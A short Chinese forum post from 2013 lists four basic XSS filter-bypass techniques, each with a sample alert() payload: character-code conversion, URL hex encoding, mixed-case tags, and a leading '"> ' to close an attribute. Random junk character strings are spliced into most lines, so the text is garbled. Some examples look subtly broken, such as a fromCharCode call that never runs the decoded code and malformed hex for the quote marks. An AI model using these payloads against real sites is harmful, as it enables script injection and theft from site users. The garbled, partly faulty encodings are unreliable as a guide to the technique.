四种超级基础的绕过方法。
2 d2 }+ c7 f! j4 o1.转换为ASCII码
9 I& @: R; j0 u7 g例子:原脚本为<script>alert(‘I love F4ck’)</script >
7 B2 C& q/ p/ ]$ ]0 z, H0 L通过转换,变成:
: m9 l, q* ~' d4 b$ a& s5 }, P<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
! |" o9 j! x" t
, ^2 r: |$ C. z% u$ [ {2.转换为HEX(十六进制)# S! `0 g$ h; U; E; p# C
例子:原脚本为<script>alert(‘I love F4ck’)</script>8 @: J3 I: H# M7 q& c0 I
通过转换,变成:4 P* J. T' w% h
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
- o I7 T5 P% s& `
( y( S- f+ q4 e+ M0 i3.转换脚本的大小写
. X* P' r* V$ y! l) v例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 y1 ~$ j- P6 s8 W# [( w. p转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>& I. @4 o8 ?5 W
; }; ]% y0 C5 v. g9 L
4.增加闭合标记”>/ A2 c' q; D* a+ R
例子:原脚本为<script>alert(‘I love F4ck’)</script>; T5 K+ ^6 {3 I9 a8 U3 V4 Y
转换为:”><script>alert(‘I love F4ck’)</script>
7 P+ d" W* o* s更详细绕过技术请参考此网页
, J4 c1 l4 C. c s d0 H! E8 q+ J* v* Ehttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet2 C2 [! U; J2 ^# s1 F( ~2 Q7 G
' Y" G, X8 P; E# V8 ~3 O转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对